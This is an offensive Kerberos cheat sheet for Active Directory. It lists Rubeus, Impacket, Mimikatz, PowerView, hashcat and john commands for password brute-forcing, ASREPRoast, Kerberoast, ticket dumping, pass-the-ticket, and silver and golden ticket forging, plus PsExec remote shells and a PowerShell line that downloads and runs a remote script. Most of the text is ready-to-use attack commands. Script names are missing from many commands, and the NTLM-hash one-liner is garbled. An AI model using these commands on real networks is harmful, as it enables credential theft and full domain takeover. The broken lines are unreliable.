Requirements: connection with DC/KDC.
python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
Cracking users password, with KRB_AS_REQ when user has DONT_REQ_PREAUTH attribute, KDC respond with KRB_AS_REP user hash and then go for cracking.
# LDAP filter for non preauth krb users
LDAP: (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
With Impacket example
# check ASREPRoast for all domain users (credentials required)
python <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# check ASREPRoast for a list of users (no credentials required)
python <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
With Rubeus:
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
# Powerview
Get-DomainUser -PreauthNotRequired
Cracking with dictionary of passwords:
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>
Cracking users password from TGS, because TGS requires Service key which is derived from NTLM hash
# LDAP filter for users with linked services
LDAP: (&(samAccountType=805306368)(servicePrincipalName=*))
With Impacket example
python <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
With Rubeus:
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
With Powershell:
iex (new-object Net.WebClient).DownloadString("")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Cracking with dictionary of passwords:
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
NTDS.DIT, SAM files or lsass with mimi
By using Impacket examples:
# Request the TGT with hash
python <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python <domain_name>/<user_name>:[password]
# If not provided, password is asked
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
MiTM, lsass with mimi
Check type and location of tickets:
grep default_ccache_name /etc/krb5.conf
If none return, default is FILE:/tmp/krb5cc_%{uid}.
In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being KEYRING tickets, you can use tickey to get them:
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
With Mimikatz:
mimikatz # sekurlsa::tickets /export
With Rubeus in Powershell:
.\Rubeus dump
# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
To convert tickets between Linux/Windows format with
# ccache (Linux), kirbi (Windows from mimi/Rubeus)
python ticket.kirbi ticket.ccache
python ticket.ccache ticket.kirbi
With Impacket examples:
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>
# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Inject ticket with Mimikatz:
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Build a TGS with Service key
With Impacket examples:
# To generate the TGS with NTLM
python -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# To generate the TGS with AES key
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
With Mimikatz:
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Build a TGT with NTLM hash and krbtgt key, valid until krbtgt password is changed or TGT expires
Tickets must be used right after created
With Impacket examples:
# To generate the TGT with NTLM
python -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# To generate the TGT with AES key
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
With Mimikatz:
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
To get NTLM from password:
python -c 'import hashlib,binascii; print binascii.hexlify("md4", "<password>".encode("utf-16le")).digest())'
Allows a service impersonate the user to interact with a second service, with the privileges and permissions of the user
- If a user has delegation capabilities, all its services (and processes) have delegation capabilities.
- KDC only worries about the user who is talking to, not the process.
- Any process belonging to the same user can perform the same actions in Kerberos, regardless of whether it is a service or not.
- Unable to delegate if NotDelegated (or ADS_UF_NOT_DELEGATED) flag is set in the User-Account-Control attribute of the user account or user in Protected Users group.
- User1 requests a TGS for ServiceZ, of UserZ.
- The KDC checks if UserZ has the TrustedForDelegation flag set (Yes).
- The KDC includes a TGT of User1 inside the TGS for ServiceZ.
- ServiceZ receives the TGS with the TGT of User1 included and stores it for later use.
Delegation is constrained to only some whitelisted third-party services.
- S4U2Proxy Contrained
- S4U2Proxy RBCD
- S4U2Proxy Service Name Change
- S4U2Self
- S4U2Self & S4U2Proxy combined Contrained
- S4U2Self & S4U2Proxy combined RBCD
- RBCD attack
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